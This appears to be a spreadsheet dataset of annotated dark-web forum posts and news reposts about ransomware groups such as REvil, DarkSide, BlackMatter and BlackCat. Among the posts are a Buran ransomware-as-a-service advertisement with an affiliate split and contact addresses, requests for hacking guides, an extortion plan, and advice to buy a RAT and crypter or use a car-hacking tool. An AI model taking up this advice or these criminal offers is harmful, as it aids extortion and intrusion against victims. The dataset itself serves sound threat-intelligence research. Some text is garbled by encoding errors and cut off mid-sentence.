    <t>hello, been doing some work in frauding pp and se, but wanting to get to be able to know how to do things like ransomware, malware, ddos, etc. of course these are a very very broad field, and i dont know how to sort out good guides from junk on dnms. anyone know a good place to get started on one of these things? just need to start with one. thx!</t>
  </si>
  <si>
    <t>User asking for some guides on un-ethical hacking including ransomware</t>
  </si>
  <si>
    <t>/u/Born2ctoo</t>
  </si>
  <si>
    <t>0eaeb0683d39031631a2</t>
  </si>
  <si>
    <t>Best websites for Un-Ethical Hacking?</t>
  </si>
  <si>
    <t>1 days 15:34:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;amid a spate of recent high-profile, costly ransomware attacks, the white house is under increased pressure to respond, leading to a high-level interagency meeting on wednesday morning.;;source: msn / yahoo us;;over the long holiday weekend, a russia-based cybercrime outfit called revil claimed responsibility for infiltrating a network-monitoring tool sold by the software company kaseya, taking hostage files belonging to 800 to 1,500 small and medium-size businesses in the u.s., europe and asia, according to the company, and demanding $70 million to unlock them all.;;while ransomware has existed as a means for extortion for many years, cybercriminals have taken advantage of lowered cybersecurity protections while employees work from home during the coronavirus pandemic, as well as increasingly available commercial technologies sold by professional criminal gangs that sell ransomware tools as a service and split the profits. revil is one of the top such criminals, responsible for 42 percent of known ransomware victims, according to the cybersecurity firm recorded future.;;the network-management tool sold by kaseya is used by hundreds of thousands of firms, which suggests that the impact of the recent attack is more limited than it could have been. even so, the scale of the attack may be unprecedented, according to cybersecurity experts. cybercriminals have learned that targeting companies in the supply chain, whose products are used by a large number of other companies, allows them to hit the highest number of victims in the shortest amount of time, maximizing profit, though drawing perhaps unwanted attention from law enforcement and the international community.;;additionally, the attackers took advantage of previously undisclosed vulnerabilities in the company���s monitoring software, rather than recycling old, previously known yet unpatched holes, and thereby demonstrated a higher level of sophistication and made it less likely the company could put up defenses in time.;;with a recent crippling ransomware attack that halted fuel supply to the east coast for multiple days and another on the world���s largest meat producer, the targeting of kaseya has raised awareness of the threat posed by ransomware, leading the biden administration to convene a meeting with officials from the state department, pentagon, justice department and intelligence community, according to white house press secretary jen psaki.;;���it is something that from day one [the president] has made a priority and has asked his team to focus on where we can have an impact, how we can better work with the private sector and what we can do across the federal government to help address and reduce ransomware attacks on our critical infrastructure but also on a range of entities in the united states,��� psaki said on tuesday.;;additionally, biden���s top cybersecurity adviser anne neuberger convened a virtual meeting tuesday with mayors around the country on cybersecurity challenges, focusing topic, according to a readout of the meeting provided by the white house.;;the white house has already broadly laid out its main avenues to address the threat, including disrupting ransomware infrastructure and operators, working more closely with the private sector, partnering with allies to pressure nations that harbor cybercriminals, enhancing cryptocurrency analysis to track down bad actors and establishing clear standards to handle ransomware payments.;;some of those efforts are already underway. for example, the justice department���s new ransomware task force recently seized a large portion of the $4.4 million ransomed from colonial pipeline co. in may, ultimately leading the hacking group to close up shop. however, not all payments are easily tracked, particularly if criminals use more anonymous payment systems like monero.;;in recent days there have been increasing calls for the white house to address the threat quickly to help businesses defend against the onslaught of ransomware attacks.;;whi fbi recommends that businesses not pay ransom to criminals, as it only encourages future crime, there are no clear requirements for affected companies to report a breach to the federal government or discuss a payment with the fbi. lawmakers are currently considering the possibility of increasing cybersecurity reporting requirements for the private sector with the white house.;;some lawmakers are pushing for the government to strike back, using offensive cyberattacks to disrupt criminal hacking groups. biden has made it clear that he reserves the right to respond with the government's own cyberattack, though there have not been any reported disruptions to criminal networks as of yet, and it���s unclear whether additional attacks could lead to an escalatory spiral with limited impact on deterring cybercrime.;;there is also pressure for the president to make good on his recent promise during a summit with russian president vladimir putin in geneva to respond to a seemingly endless stream of ransomware attriginating from criminal groups operating in russia. following his meeting with putin, biden said during a press conference that ���responsible countries need to take actions against criminals who conduct ransomware activities on their territory.���;;while biden told reporters on tuesday that the government was still determining the origin of the kaseya ransomware attack, the claim of responsibility from revil has prompted some lawmakers and cybersecurity experts to call on the president to respond forcefully.;;���if this latest attack was indeed launched at least in part from russia, then biden���s own strategy demands he take action,��� wrote dmitri alperovitch, the former chief technology officer at the cybersecurity firm crowdstrike, and matthew rojansky, the director of the wilson center���s kennan institute, in the washington post. that action could include sanctions or other punitive measures, the authors suggested.;;���stopping ransomware attacks is an urgent s, not just big companies and tech interests. biden was right to raise the issue with putin in geneva,��� concluded alperovitch and rojansky. ���now, he has an opportunity to set the future tone by delivering a quiet but clear ultimatum and, if necessary, follow through on it.���;;the biden administration may take action before long. it has announced meetings with russian representatives next week to discuss the threat of ransomware, where u.s. cybersecurity officials will likely deliver their own demands to hold cybercriminals operating in russia responsible.;;and if russian officials fail to deliver, the biden administration may take matters into its own hands. ���if the russian government cannot or will not take action against criminal actors residing in russia, we will take action or reserve the right to take action on our own,��� said psaki on tuesday.;;when asked by reporters before taking off on marine one on wednesday what his message to putin will be on the recent spate ��i will deliver it to him.���</t>
  </si>
  <si>
    <t>news article on US being under pressure to respond to escalating ransomware attacks</t>
  </si>
  <si>
    <t>2038c46f7fab8e2360de</t>
  </si>
  <si>
    <t>Biden White House Under Pressure to Ramp Up Response to Escalating Ransomware Attacks</t>
  </si>
  <si>
    <t>2 days 22:17:00</t>
  </si>
  <si>
    <t>{'extortion': 1, 'revil': 3, 'ransomware': 15}</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;with the rapid growth of personal information for sale on the dark web, privacy affairs has published its 2021 dark web price index, detailing average prices for a range of products, including the kinds of selfies holding an id that can be used in biometric spoof attacks, across marketplaces, forums, and websites.;;source: biometricupdate;;a forged maltese passport was found to be the most expensive product found with an average price of us$6,500, while a forged u.s. valid social security number was one of the lowest coming in at $2.00. rising prices across products is most likely due to the increasing risks of attaining the information, the increasing benefit for buyers to use the information, the increased quality/accuracy of the card data, says privacy affairs.;;a ���usa selfie with holding id,��� such as would be used for selfie biometrics in identity verification, is listed for $100.;;2020 saw a massive increase in cyberattacks, according to pa, not only in t the variety of items to purchase has grown as well, such as hacked crypto accounts, web services like uber accounts and face images.;;���it���s no longer enough to just have a person���s id, you need to confirm identity with a selfie. and since all business had to be conducted online during the pandemic, people inevitably had to provide a selfie to verify their identity. for some reason, people are not as careful as they should be with their data online, so malicious actors just take advantage of how easy it is to collect information,��� says cybersecurity researcher luana pascu in an email to biometric update.;;credit cards;;a cloned mastercard with pin costs around $10 more this year ($25) than last year ($15); vendors of stolen credit card data tend to offer a guarantee of 80 percent, which means that two out of every ten cards aren���t accurate. though card numbers on the dark web are a result of data compromises at merchant locations and not at card issuers themselves, usae valued the lowest (due to high supply), and israel the highest according to the index. credit cards are sold in the format of: [cc|mm|yy|cvv|holder_name|zip|city|address|email|phone], the first 4 sections are card details and the following 5 sections show the cardholder information.;;���financial crimes have increased during the pandemic. when the pandemic started, there was a spike in sales related to covid masks and other equipment that was hard to find at the time. some marketplaces even went from public to private, but overall sales did not necessarily go down,��� says pascu, ���the social engineering tactics used to lure victims into revealing personal information seem to be effective during tax season or when covid-19-related information is involved. however, there have been fraud prevention methods implemented, making it harder to abuse the (canadian government) benefit program.���;;crypto;;dark web buyers have abandoned bitcoin (btc) due to a lack of security, according to the demanding buyers to use monero as payment and communicate only through pgp encryption (pretty good privacy) in order to mitigate detection and tracking by law enforcement. furthermore, hackers are meanwhile resorting to social engineering techniques to gain login credentials, which is very labor intensive for a relatively low success ratio due to a recent increase in security measures (e.g., mfa, account locks) implemented by social media platforms. hacked crypto accounts seem to be one of the most valuable items for purchase, with a verified coinbase account selling for around $610.;;health passes and deepfakes;;paypal account details are widely available online, and the list of illegal good on offer also includes distributed denial of service (ddos) attack services, digital health passes and deepfakes.;;���malicious actors are also talking about ways to obtain covid passports or vaccination certificates,��� pascu observes, ���but this activity is currently flagged as illegal on most markhical purposes,��� as stated on a group we monitor.���;;deepfakes are also gaining momentum and popularity on the dark web, with criminal deepfake activity developing into an economic niche. deepfake services were found offered on a hack forum for $20 per minute of fraudulent video last june. ���in addition to posts about deepfakes impersonating celebrities in adult videos, there are forums listing different schemes and tools to create your own for use in identity verification, and there is some interest in methods to make money with deepfakes,��� comments pascu.;;sale of counterfeit money was also prevalent, with usd, eur, gbp, cad, aud being the most common.;;malicious actors are changing the way in which the market operates, warns pascu; ���up until recently, ransomware groups were looking for specific profiles to add to their affiliate programs such as fluent russian speakers with solid experience in specific types of attack methods. as they are regrouping, we are looking at pponent.���;;privacy affairs also provides a set of recommendations for individuals to best protect themselves and their information from fraudulent online act</t>
  </si>
  <si>
    <t>news article on the wide range of identies for sale on the dark web, their costs an reasons why (including ransomware)</t>
  </si>
  <si>
    <t>30/06/2021 17:59</t>
  </si>
  <si>
    <t>a8d59bd18c7d60cac379</t>
  </si>
  <si>
    <t>Biometric Selfies and Forged Passports: Identities for Sale on The Dark Web</t>
  </si>
  <si>
    <t>the blackcat ransomware group, also known as alpv, has reportedly leaked samples of data from a stash that it claims to have acquired it from the aviation services company swissport in a brazen cyberattack.;;the cybercriminal group has said that the latest data being leaked on the dark web was the product of a cyber breach that was orchestrated in early february, and that they are currently in an active process of seeking a buyer for the compromised data.;reportedly, the stolen data includes both internal and business documents and the personal data of individuals ��� including scanned passports and identification cards, personally identifiable information (pii) belonging to employment candidates (with names, passport numbers, nationalities, email addresses, and phone numbers).;more data has been identified as information concerning victims��� religion, which adds up to the protected categories of data under the general data protection regulation (gdpr).;;it turned out that the cyberattack was notough to cause significant disruption to swissport���s operations, although a small number of flights were delayed as a result.;the firm was quick to intimate that they had managed to contain the cyberattack before it got out of hand ��� this included a number of manual procedures and fallback systems that brought normalcy within a mere 48 hours.;;no negotiation with hackers;;quite obviously, swissport���s swift response may be attributed to a possible ransomware plan in place considering how lethal ransomware groups have caused a number of companies massive losses running into millions of dollars.;what���s more interesting is the indication that swissport chose not to negotiate with the hackers behind the data breach, which points to its solid confidence in its mitigations and protective measures such as the fallback systems that came in handy.;;nonetheless, it appears that blackcat went ahead to do the expected; publish samples of the large trove of stolen data with the intention of pend to their demands. a twitter post by darktracer featured screenshots of a sample of the 1.6tb worth of data being circulated by the ransomware gang on the dark web.</t>
  </si>
  <si>
    <t>Post stating blackcat ransomware group has claimed resposabillity for Swissport hack</t>
  </si>
  <si>
    <t>/u/tapesup</t>
  </si>
  <si>
    <t>23/02/2022 12:19</t>
  </si>
  <si>
    <t>167dd6582b7dbe68a5df</t>
  </si>
  <si>
    <t>BlackCat Ransomware Group Claims Responsibility for Swissport Hack</t>
  </si>
  <si>
    <t>{'blackcat': 2, 'ransomware': 4}</t>
  </si>
  <si>
    <t>does anyone have contact details for blackcat/alphv? tox or telegram?;;there arent any on their site: alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad onion</t>
  </si>
  <si>
    <t>User asking for contact details for blackcat group</t>
  </si>
  <si>
    <t>/u/darkspinachfish</t>
  </si>
  <si>
    <t>27/06/2022 16:10</t>
  </si>
  <si>
    <t>051be0a7975466b51eb4</t>
  </si>
  <si>
    <t>BlackCat/ALPHV contact details</t>
  </si>
  <si>
    <t>olympus, a leading medical technology company, is investigating a "potential cybersecurity incident" that impacted some of its emea (europe, middle east, africa) it systems last week.;;olympus has more than 31,000 employees worldwide and over 100 years of history developing for the medical, life sciences, and industrial equipment industries.;;the company's camera, audio recorder, and binocular divisions have been transferred to om digital solutions, which has been selling and distributing these products starting with january 2021.;;"olympus is currently investigating a potential cybersecurity incident affecting limited areas of its emea (europe, middle east, africa) it systems on september 8, 2021," the company said in a statement published saturday, three days after the attack.;;"upon detection of suspicious activity, we immediately mobilized a specialized response team including forensics experts, and we are currently working with the highest priority to resolve this issue.;;"as part of the investigation, we have suspended data transfers in the affected systems and have informed the relevant external partners.";;olympus also said that it's working on discovering the extent of the damage resulting from this attack and will share additional info as soon as it is available.;;christian pott, company spokesperson responsible for olympus corporate matters, also told bleepingcomputer that customer security and service were not affected by the incident.;;"the support, service and security of our customer has the highest priority and is not effected by this case," an olympus spokesperson told bleepingcomputer when contacted via email.;;"please understand, that we cannot give any further information or statement due to the ongoing process of internal and external investigation.";;while olympus did not share any details on the attackers' identity, ransom notes left on systems impacted during the breach point to a blackmatter ransomware attack, as first reported by techcrunch.;;the same ransom notes also point to a tor website the blackmatter gang has used in the past to communicate with victims.;;blackmatter is a relatively new ransomware operation that surfaced at the end of july 2021 and was initially believed to be a rebrand of darkside ransomware.;;from samples collected by researchers after some of their subsequent attacks, it was later confirmed that blackmatter ransomware's encryption routines were the same custom and unique ones that darkside used.;;the darkside operation shut down after attacking and shutting down colonial pipeline due to pressure from both international law enforcement and the us government.</t>
  </si>
  <si>
    <t>News article on Blackmatter group allegedly attacking Olympus (medical tech)</t>
  </si>
  <si>
    <t>15/09/2021 14:54</t>
  </si>
  <si>
    <t>92494066d63f9ffe4ba6</t>
  </si>
  <si>
    <t>BlackMatter ransomware hits medical technology giant Olympus</t>
  </si>
  <si>
    <t>0 days 07:06:00</t>
  </si>
  <si>
    <t>{'darkside': 3, 'blackmatter': 3, 'ransomware': 2}</t>
  </si>
  <si>
    <t>thanks, but could you please link your sources? and i'm excited to see the leak on;blackmatter's website;.</t>
  </si>
  <si>
    <t>User asking for credable source links to this attack</t>
  </si>
  <si>
    <t>/u/hohenzechner</t>
  </si>
  <si>
    <t>15/09/2021 22:00</t>
  </si>
  <si>
    <t>kennt irgendjemand einen link wo die gruppe blackcat ihre leaks ver��ffentlicht? w��rde mich mal intere</t>
  </si>
  <si>
    <t>Post talking about the Blackcat leak</t>
  </si>
  <si>
    <t>/u/lostBoyy</t>
  </si>
  <si>
    <t>29/08/2022 17:52</t>
  </si>
  <si>
    <t>/d/austria</t>
  </si>
  <si>
    <t>44cc00c53d2450361dc9</t>
  </si>
  <si>
    <t>Blackcat Leak</t>
  </si>
  <si>
    <t>{'blackcat': 1}</t>
  </si>
  <si>
    <t xml:space="preserve">;read this article on deepwebfeed;;colonial pipeline co. paid hackers to restore access to its computer network, according to a thursday bloomberg report that contradicted early claims by numerous media outlets.;;the company paid nearly $5 million in ���untraceable��� cryptocurrency to the perpetrators to provide a tool for decrypting its network, bloomberg said, citing ���two people familiar with the transaction.��� the development contradicts earlier reports from the washington post and cnn backing claims that colonial had no intention of paying the hackers.;;the pipeline company resumed operations on wednesday evening, five days after the may 7 attack, which was credited to an eastern european hacking group known as darkside. fuel shortages have taken hold across the eastern seaboard over the last week as a result of the incident, leading the u.s. department of transportation���s federal motor carrier administration to issue a regional emergency declaration in all of the statestructure ��� including alabama, delaware, georgia, louisiana, maryland, mississippi, pennsylvania, new jersey, north carolina, south carolina, tennessee, virginia, and texas.;;the fbi has said it ���urges��� companies against accommodating so-called ���ransomware��� demands. however, asked this week if the white house had knowledge of colonial doing so, deputy national security adviser anne neuberger demurred, saying, ���colonial is a private company, and we���ll defer information regarding their decision on paying a ransom to them.���;;she added that it would be a ���private-sector decision��� for the company to make, and said the administration had ���not offered further advice.���;;it isn���t clear how colonial used cryptocurrency to facilitate the transaction in a manner that would have been untraceable. few, if any, digital currencies other than monero prevent security researchers </t>
  </si>
  <si>
    <t>News article stating that Colonal Pipeline paid hackers to restore service despite what other media articles said</t>
  </si>
  <si>
    <t>18/05/2021 14:38</t>
  </si>
  <si>
    <t>59095b4e26fbf693a4d8</t>
  </si>
  <si>
    <t>Bloomberg Says Colonial Pipeline Paid Hackers $5 Million in Crypto, Contradicting Other Media Reports</t>
  </si>
  <si>
    <t>the fbi said the ransomware darkside was responsible for the attack on the colonial pipeline, a major supplier of gasoline and petroleum products in the united states. security researcher brian krebs found that hackers do not attack systems in the countries of the former soviet bloc.;;flashpoint, a new york-based cyber intelligence company, said the darkside attack was not aimed at damaging national infrastructure, but involved extortion. previously, hackers from the group have already taken similar actions against other companies with solid capital.;;darkside itself confirmed that "they do not participate in geopolitics," but "make money." the group promised to take measures to ensure that such attacks, with serious consequences for society, do not recur in the future.;;darkside started working on russian-language hacker forums in august 2020. hackers provide ransomware to attack companies in order to demand money to unblock and remove stolen information. representatives of the group stated that they have a ban on attacks against health organizations, funeral services, education, the public sector and ngos.;;at the end of march, darkside introduced a ���call service��� that was integrated into the control panel and made it possible to organize calls to force victims to pay ransom. in mid-april, the group announced a new ability to launch distributed denial of service (ddos) attacks against targets whenever additional negotiation pressure is required. darkside also advertised the ability to sell information about victims prior to posting the stolen information on a dedicated blog so that scammers could cash in on their promotions.;; along with intel 471, analyzed negotiations between the darkside team and a $ 15 billion us company that received a $ 30 million ransom demand in january 2021. at first, the victim company offered to pay only $ 2.25 million. traded, but in the end agreed to reduce the ransom requirement to $ 28.7 million, threatening to then raise the price tag immediately to $ 60 million.the company raised the amount to $ 4.75 million, and the hackers made a new concession - they reduced the ransom amount to $ 12 mln. in response, the victim demanded guarantees that classified information would not be disseminated and that such attacks would not be repeated. the hackers agreed to these terms.;;according to flashpoint, some of the hackers behind darkside were working with another ransomware, revil, also known as sodinokibi.;;krebs notes that darkside, like many other ransomware, will not install on systems with cyrillic keyboards and other scripts. at the same time, the description of darkside from mandiant and fireeye says that the malware checked the system language before hacking.;;this is also confirmed by the analysis from cybereason defense. when the ransomware runs on an infected host, it checks the language using the getsystemdefaultuilanguage () and getuserdefaultlangid () functions to avoid systems located in the former soviet bloc countries;;in the commentary to the analysis, the user drew attention to the fact that this information does not relate to information on the localization of systems.;;meanwhile, the fbi believes that darkside is based in russia or one of the countries of eastern europe. us president joe biden said there was no evidence of this, but russia could be held responsible for the attacks if cybercriminals operated from its territory. moscow denies involvement in the hack.;;meanwhile, hackers from the darkside group organized an attack on the french division of the japanese corporation toshiba. they stole more than 740 gigabytes of information, including about new business projects, as well as personal data.</t>
  </si>
  <si>
    <t>news article on Colonal pipeline attack related to a related Brian Krebs article discussing the observation that Darkside (the perpertrator) does not attack countries part of the solviet block despite their statements that they are geopolically motivated</t>
  </si>
  <si>
    <t>/u/Chlotar</t>
  </si>
  <si>
    <t>18/05/2021 23:55</t>
  </si>
  <si>
    <t>eff86d4aac00062b7450</t>
  </si>
  <si>
    <t>Brian Krebs: Darkside Ransomware Does Not Encrypt Pcs With Russian Keyboard Layout</t>
  </si>
  <si>
    <t>0 days 19:14:00</t>
  </si>
  <si>
    <t>{'darkside': 9, 'ransomware': 3}</t>
  </si>
  <si>
    <t>buran - stable offline cryptolocker ransomware;;functional;[+] reliable cryptographic algorithm using global and session keys + random file keys;[+] scan all local drives and all available network paths;[+] high speed: a separate stream works for each disk and network path;[+] skipping windows system directories and browser directories;[+] decryptor generation based on encrypted file;[+] correct work on all oss from windows xp, server 2003 to the newest;[+] the locker has no dependencies, does not use third-party libraries, only math and winapi;[+] completion of some processes to free open files (optional);[+] ability to encrypt files without changing extensions (optional);[+] removing recovery points + cleaning logs on a dedicated server (optional);[+] standard options: tapping, autoload, self-removal (optional);;benefits;[+] we use only the most reliable and tested developments;[+] we have never been decrypted, the analysis of our software has been repeatedly made;[+] software works correctly on all current versions of windows;[+] process completion and release of busy files are provided, it is possible to add your own commands to run in the holder system;[+] the locker has no dependencies, does not use third-party libraries and cryptoapi;[+] argument passing is implemented, drag &amp; drop is provided, you can quickly encrypt the most valuable data on the attacked system;;terms;25% of the amount of ransom;;start earning with us!;;contacts for communication:;buransupport@thesecure.biz;buransupport@exploit.im;buransupport@xmpp.jp</t>
  </si>
  <si>
    <t>Post promoting new cryptolockr related ransomware</t>
  </si>
  <si>
    <t>/u/zeppelin</t>
  </si>
  <si>
    <t>14/04/2020 20:27</t>
  </si>
  <si>
    <t>23202bd610a4a0d4c773</t>
  </si>
  <si>
    <t>Buran Ransomware-as-a-Service (RaaS)</t>
  </si>
  <si>
    <t>hi, i am new to c and c++ i know the basis of these two languages and i was wondering which language is the best for malware development between them? specially for reverse shell and ransomware?</t>
  </si>
  <si>
    <t>User asking for advice on whether to use C or C++ for malware creation</t>
  </si>
  <si>
    <t>/u/ghost_m</t>
  </si>
  <si>
    <t>13/07/2022 23:11</t>
  </si>
  <si>
    <t>c1daea584ce153e8323a</t>
  </si>
  <si>
    <t>C or C++ for malware development</t>
  </si>
  <si>
    <t>56 days 23:35:00</t>
  </si>
  <si>
    <t>i would say golang but if you combine it with c. you will build a very powerful malware</t>
  </si>
  <si>
    <t>User responding with appropreate information (golang + C)</t>
  </si>
  <si>
    <t xml:space="preserve">education (provider) </t>
  </si>
  <si>
    <t>/u/vpsgeek</t>
  </si>
  <si>
    <t>24/07/2022 13:08</t>
  </si>
  <si>
    <t>10 days 13:57:00</t>
  </si>
  <si>
    <t>my opinion, c++. c and c++ is not that different but if you master one of these languages you can do alot in regards of malware and hacking.</t>
  </si>
  <si>
    <t>User responding with appropreate information (Either)</t>
  </si>
  <si>
    <t>/u/Nifeyy</t>
  </si>
  <si>
    <t>28/07/2022 19:08</t>
  </si>
  <si>
    <t>4 days 06:00:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;cyberpunk developer refused to pay up after exposure to ransomware attack. earlier this week, cd projekt red announced that it had been hit with a ransomware attack that allegedly exposed the source code for games including cyberpunk 2077, gwent, and the witcher 3. now, security experts are reporting that the source code has been auctioned off on a dark web forum, seemingly for millions of dollars.;;vx underground, which tracks ransomware and other malware attacks, noted on wednesday that the ransomed source code had been posted on a dark web forum known as exploit. the starting bid was reportedly $1 million, with a $500,000 bidding increment and $7 million "buy it now" price.;;cyber intelligence firm kela confirmed the authenticity of that auction, telling the verge that forum users needed to put up 0.1 btc (roughly $4,700 as of this writing) to participate in the bidding as a sign that offers were legitimate. the sellers also reportedly provided file listings for gwent and the red engine that underlies cdpr's games as proof that the data was authentic.;;while the auction was originally intended to run for 48 hours, by thursday morning kela and vx underground were both reporting that it had been closed successfully. "an offer was received outside the forum that satisfied us," the sellers wrote, according to the reports.;;(;update:;at least one analyst sees reason to doubt the seller's report of a separate buyer swooping in from outside the auction. "there is another possible scenario that we think is more likely: no buyer exists and the closure of the auction is simply a means for the criminals to save face after failing to monetize the attack following cd projekt���s refusal to pay the r" emsisoft threat analyst brett callow wrote in a blog post. "we have seen this behavior in the past with revil, a ransomware group that threatened to release damaging information about donald trump. although the hacked law firm refused to pay to prevent the leak, the information was never published���the attackers just claimed to have so")</t>
  </si>
  <si>
    <t>News article on CD Projekt souce code being sold on the dark web after attack</t>
  </si>
  <si>
    <t>24/02/2021 14:51</t>
  </si>
  <si>
    <t>f963a041cb42f4e68ea5</t>
  </si>
  <si>
    <t>CD Projekt Red Source Code Reportedly Sells for Millions in Dark Web Auction</t>
  </si>
  <si>
    <t>im not infecting random people, im going to be targeting pedos to extort. i need it to say we are law enforcement but we are corrupt. therefore if you pay the ransom we wont send evidence of videos/pictures/chatlogs to the police. these people also will most likely have cp on their pc. if that is  encrypted they will pay the ransom. then we never decrypt it or maybe we could give the code to decrypt it to the police anonymously so there is more evidence against him. we will report him anonymously to the police after he has paid. if we have good opsec we shouldnt be caught. this is promising but this ransomware is needed for this line of work. anyone who can make a sub on this name it extortingpos or something lol. here is a story on it:https://www.theregister.co.uk/2015/12/08/blackmail_paedo_hunter_jailed/;price?</t>
  </si>
  <si>
    <t>User requesting a ransomware to be created/advice to target "pedofillia"</t>
  </si>
  <si>
    <t>/u/chroma17</t>
  </si>
  <si>
    <t>17/03/2020 06:29</t>
  </si>
  <si>
    <t>58989407797e0fb19d61</t>
  </si>
  <si>
    <t>Can anyone make a ransomware?</t>
  </si>
  <si>
    <t>2 days 09:32:00</t>
  </si>
  <si>
    <t>ransomware price is not a problem , exploits price is the problem. you can't spread exe without binding it to an doc/pdf/xls and you can't spread shitty exploits also.</t>
  </si>
  <si>
    <t xml:space="preserve">User stating that their plan may not be as easy as they think and discouraging the use of ransomware  </t>
  </si>
  <si>
    <t>education / information (provider)</t>
  </si>
  <si>
    <t>/u/TheScorpion</t>
  </si>
  <si>
    <t>17/03/2020 06:38</t>
  </si>
  <si>
    <t>you don't need ransomware to blackmail someone.;;might be more ideal to purchase a rat and crypter to infect the target in question. figure out as much about them as possible and away you go.</t>
  </si>
  <si>
    <t>17/03/2020 16:02</t>
  </si>
  <si>
    <t>0 days 04:22:00</t>
  </si>
  <si>
    <t>true, ill see what i can do without the ransomware</t>
  </si>
  <si>
    <t>Original user agreeing with the information provided and deciding to find a diffrent way to acheive their goal</t>
  </si>
  <si>
    <t>17/03/2020 17:03</t>
  </si>
  <si>
    <t>0 days 01:01:00</t>
  </si>
  <si>
    <t>buy a ransomware and spread it around million email adresses;;not worth it mining bitcoin nowadays</t>
  </si>
  <si>
    <t>User stating to just buy an ransomware to spread using stolen graphics cards, not to gain profit via bitcoin mining</t>
  </si>
  <si>
    <t>/u/banjo8x2</t>
  </si>
  <si>
    <t>dc691739c0a517969595</t>
  </si>
  <si>
    <t>Can police somehow trace me if I make mining rig with stolen graphics cards?</t>
  </si>
  <si>
    <t>3 days 19:37:00</t>
  </si>
  <si>
    <t>11 days 00:17:00</t>
  </si>
  <si>
    <t>i tried learning ransomware and shit, looks too hard, just wanna do swiping now.</t>
  </si>
  <si>
    <t xml:space="preserve">User stating that ransomware was too hard for them </t>
  </si>
  <si>
    <t>/u/buzooka</t>
  </si>
  <si>
    <t>30/04/2022 07:38</t>
  </si>
  <si>
    <t>b6cbb85e51fa56d8ca8d</t>
  </si>
  <si>
    <t>Can someone send me a guide on swiping</t>
  </si>
  <si>
    <t>1 days 10:50:00</t>
  </si>
  <si>
    <t>i just wrote and lost a 3,000 word reply to lose it all.;;1) in short, never in the history of seizes has law enforcement deceived the canary.;;2) our communication is faster and our cooperation exceeds there's'.;;3) usually a mod or admin has posted a message to stay clear.;;4) paradoxically, however, in a world of shadows and anonymity, more information can be the key to success . it���s very difficult to judge whether it���s safe to trust a username and avatar on a messaging service, especially when you can���t see how that user has interacted with other threat actors . although cybercriminals undoubtedly don���t want to;reveal any of their real-life, personal information, for successful transactions they need to present details of their online identities . forums let them build up entire virtual personas.;;5) the canary -;airing doubts about alternative technologies .a key concern for cybercriminals when choosing where and how to operate is security, and how easy it is to maintain ing on new technologies and messaging services for security���no matter how ostensibly secure they are���inherently means trusting those platforms��� operators not to compromise their users��� anonymity, either deliberately or inadvertently .;;5.5) next, the english-language forum dread introduced a ���canary��� feature, aimed at updating forum members of the status of dread���s administrator and their control of the forum . these weekly updates, conducted via a personalized, cryptographically signed message from the administrator, were likely introduced following that individual���s september 2019 disappearance from the forum, which threw the community into disarray . the canary feature demonstrates a clear intent to sustain the credibility of the forum, eliminate the potential for a law-enforcement takeover, and avoid a takeover by someone masquerading as the legitimate administrator.;;6.) paradoxically, however, in a world of shadows and anonymity, more infor difficult to judge whether it���s safe to trust a username and avatar on a messaging service, especially when you can���t see how that user has interacted with other threat actors. although cybercriminals undoubtedly don���t want to reveal any of their real-life, personal information, for successful transactions they need to present details of their online identities. forums let them build up entire virtual personas."in mid-november 2016, an unexplained stealth error appeared in riseup's warrant canary page, and they did not respond to requests to update the canary, leading some to believe the collective was the target of a gag order.[20] on february 16, 2017, the riseup collective revealed their failure to update the canary was due to two sealed warrants from the fbi, which made it impossible to legally update their canary. the two sealed warrants concerned a public contact of an international distributed denial-of-service attack extortion ring and an account using ransomware to extort people financially."</t>
  </si>
  <si>
    <t xml:space="preserve">Post on Canary Watch (related to ransomware) </t>
  </si>
  <si>
    <t>22/12/2021 07:51</t>
  </si>
  <si>
    <t>7b13be3aa728fa2c41c9</t>
  </si>
  <si>
    <t>Canary Watch | Current Status | Market Observations</t>
  </si>
  <si>
    <t>2 days 00:57:00</t>
  </si>
  <si>
    <t>{'extortion': 1, 'ransomware': 1}</t>
  </si>
  <si>
    <t>can anyone advise;;how to install ransomware in a car ?;turn the gps tracking off?</t>
  </si>
  <si>
    <t>User asking for advice on how to install ransomware on a car</t>
  </si>
  <si>
    <t>/u/brokeFromCovidNeedWork</t>
  </si>
  <si>
    <t>23/02/2021 11:40</t>
  </si>
  <si>
    <t>f8b7c0aa2b4714a9148e</t>
  </si>
  <si>
    <t>Car Hacking</t>
  </si>
  <si>
    <t>0 days 06:43:00</t>
  </si>
  <si>
    <t>try kayak ican car hacking tool with a socketcand receiver;ive tried it with kali on my own car its working fine</t>
  </si>
  <si>
    <t>user responding with sutable advice on how to install ransomware on a car</t>
  </si>
  <si>
    <t>/u/azrael13</t>
  </si>
  <si>
    <t>23/02/2021 13:50</t>
  </si>
  <si>
    <t>0 days 02:10:00</t>
  </si>
  <si>
    <t>dear versus community,;;today we received an attempt at blackmail/extortion from the phisher, phishkingz, who is demanding that we pay him or he will leak a large amount of usernames/passwords of versus users - specifically many with pending purchases and orders.;;as always, we do not negotiate with extortionists and remain committed to supporting our community. the best way we can do that is by publicly warning you to:;;1. log in to versus through a verified, valid link;2. change your passwords;3. enable 2fa if you havent already;;if you follow these steps, you will be prepared for any potential leak in response to the phisher's extortion.;;below is the note we received from phishkingz, with some minor edits to redact sensitive data:;;---;;"going though my latest phished accounts and noticed this message you left for everyone telling them to spam my jabber :/ not cool i was a man of my word! i gave william gibson the best phishing protection method possible and you paid me 10 xmr then didn���t implement it and i still stuck to my word and took my versus mitm proxy down and kept it offline for around a year and targeted the other markets and was cool with you so i find this quite offensive! i never threatened to leak the 10s of thousands of users account and passwords i collected up but this has annoyed me! i wanted to work with you guys bringing users to the site giving you my expertise on blocking all the phishers from being able to rinse your users and change all the refund wallets.;;i have some huge buyers that use your site for example user [redacted] has spent over 10k in a very short time and logged in today and deposited another 5k into my wallet.;;[redacted];;i wish i had of carried on i gave you the best phishing protection method and you seemed really happy with it and even paid me only to leak my jabber on your market for all to see.;;i think you should start working with me instead of against me i could make this market untouchable with my ideas and methods to stop phishing and other threats...;;i could have took the 10 xmr you gave me and then leaked over 5000 of your users that have purchases there and then but i did the decent think thanked you for dealing with the situation the way you did and i then shut down my versus mitm phishing page.;;well i put it back online today and already bagged over ��5000.;;you could of paid me ��250 a week and i would of been the best thing that happened to your market you even couldn���t believe how good just my one suggestion to stop the phishers was.;;well i 